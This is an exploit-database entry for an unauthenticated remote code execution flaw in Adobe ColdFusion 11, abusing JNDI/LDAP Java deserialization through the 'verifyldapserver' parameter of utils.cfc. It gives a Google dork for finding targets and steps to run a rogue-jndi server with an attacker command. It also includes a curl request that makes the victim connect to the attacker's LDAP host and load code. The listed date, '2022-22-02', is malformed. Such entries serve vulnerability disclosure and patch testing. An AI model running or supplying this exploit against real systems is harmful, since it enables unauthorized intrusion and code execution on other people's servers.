[remote] Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)

# Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) # Google Dork: intext:"adobe coldfusion 11" # Date: 2022-22-02 # Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb) # Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html # Version: Adobe Coldfusion (11.0.03.292866) # Tested on: Microsoft Windows Server & Linux # Description: # ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution. # JNDI attack via the 'verifyldapserver' parameter on the utils.cfc ==================== 1.Setup rogue-jndi Server ==================== https://github.com/veracode-research/rogue-jndi ==================== 2.Preparing the Attack ======================= java -jar target/RogueJndi-1.1.jar --command "touch /tmp/owned" --hostname "attacker_box" ==================== 3.Launch the Attack ========================== http://REDACTED/CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json curl -i -s -k -X $'GET' \ -H $'Host: target' \ --data-binary $'\x0d\x0a\x0d\x0a' \ $'http://REDACTED//CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json' ==================== 4.RCE ======================================= Depend on the target need to compile the rogue-jndi server with JAVA 7 or 8 Can be done by modify the pom.xml as below <configuration> <source>7</source> <target>7</target> </configuration>